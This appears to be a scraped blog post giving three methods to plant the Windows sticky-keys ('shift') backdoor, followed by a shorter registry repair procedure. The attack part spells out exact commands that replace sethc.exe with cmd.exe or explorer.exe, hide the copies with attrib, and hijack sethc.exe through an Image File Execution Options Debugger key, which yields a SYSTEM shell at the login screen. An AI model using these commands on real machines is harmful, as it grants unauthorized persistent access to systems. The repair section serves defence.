Shift back door production and repair method of back door

Others 2020-10-15 16:44:44 views: null

1. How to make a shift backdoor

method 1

In the cmd window, type the command as follows:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h

attrib c:\windows\system32\dllcache\sethc.exe +h

Use the copy command to copy explorer.exe to setch.exe, so that you can call up the program management system by pressing shift 5 times in the login interface, and you have obtained system permissions.

(You can also change explorer.exe to cmd.exe , so that you can call up the cmd command by pressing shift 5 times in the login interface, and you will have shell permissions.)

Method 2

Delete C:\WINDOWS\system32\dllcache\sethc.exe, there is a cache in this folder, if not deleted, it will automatically change back

Find C:\WINDOWS\system32\cmd.exe, copy it and change the name to sethc.exe, put it back in the folder

Method 3

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Command description: reg add is to add a record to the registry, followed by the location of the registry, it should be noted here that HKLM is actually the abbreviation of HKEY_LOCAL_MACHINE. Image File Execution Option This directory is used to set up image hijacking. What is to be hijacked is the sethc sticky key program in the command. Then use / v to specify the key name. The key name debugger is fixed, and then use / t to Specify the type, that is, REG_SZ string type, and finally specify the value of the key through /d, that is, the maliciously replaced program, which is our cmd

Repair method

1. Run "regedit" to open the registry

2. Switch the location HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

If the sethc.exe item does not exist in this directory:

Right-click on Image File Execution and enter sethc.exe in the new item

Facing the newly created sethc.exe, right key, new, string value, Debugger

Double-click the newly created Debugger, and fill in afafagagag some of the values ​​you randomly hit in the numerical data

It is best to set permissions after setting, Everyone is forbidden to delete the prohibited setting item value

If the sethc.exe item exists in the directory:

Open the sethc.exe item and double-click the content in Debugger on the right to change it to afagagagag and the like (Nan Da is fine), so that you are immune and cleared the shift backdoor.

 

 

 

 

 

 

 

 

Guess you like

Origin blog.csdn.net/qq_32393893/article/details/108193449
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com